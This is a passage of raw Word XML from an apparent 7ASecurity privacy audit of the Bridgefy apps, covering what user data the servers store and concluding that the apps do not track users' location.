                <wp:wrapTopAndBottom/>
                <wp:docPr id="123" name="Graphic 123"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="123" name="Graphic 123"/>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8.507177pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15680512;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape92" coordorigin="1440,170" coordsize="2880,0" path="m1440,170l4320,170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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>188</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId277">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://bridgefy.me/privacy-policy/</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ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="363" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>message,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messageId,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>from,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>status,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>readedAt, receivedAt, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Payment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(expirationDate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>country).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to extrapolate the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to reduce the amount of data collected first, and then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>architect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>solution in a way that makes users more anonymous, difficult to track and ideally without conversation, messaging metadata or even phone numbers (which are currently required) being stored in Bridgefy servers and databases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250007" w:id="48"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q07:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>appear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>track</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Assumed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="331" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="368" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q7: Do the apps implement any sort of user tracking function via location or other </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>means?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As explained in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q06</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, Bridgefy holds a database with user phone numbers and messaging metadata. While this does not track location or face detection, it does track information such as “who talked to who” and “when”. Unless such information is periodically deleted or a solution is put in place to never store it in the first place, user trust concerns may remain regarding certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>forms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tracking.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>example,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>what</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>would happen if the authorities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>requested</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gained access to it through a malicious insider?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With the above being said, during the code review and runtime analysis of the Bridgefy Android and iOS mobile apps, as well as the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SDK,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>did</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>evidence of user location collection or face detection artifacts. Specifically, no traces of face detection features could be identified in the Bridgefy Android or iOS apps, the Android and iOS SDKs or their embedded binaries. Additionally, the iOS app did not have any artifact indicating possible location tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A minor exception to this was usage of location permissions by the Android app, however these were later confirmed not to be used for user tracking purposes. For example, although the Bridgefy Android mobile app and SDK requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ACCESS_FINE_LOCATION </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ACCESS_COARSE_LOCATION </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>permissions, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>LOCATION_MODE</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NETWORK_PROVIDER </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>GPS_PROVIDER </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are only required to obtain their status, which may be either enabled or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>disabled.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Furthermore,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="365" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>number of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>checkSelfPermission </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>instances were identified where permissions such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ACCESS_COARSE_LOCATION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ACCESS_FINE_LOCATION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are verified. Such behavior was verified in the following files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="3206" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-android/bridgefy/src/main/AndroidManifest.xml bridgefy-sdk-android/app/src/main/AndroidManifest.xml bridgefy-app-android/app/src/main/AndroidManifest.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
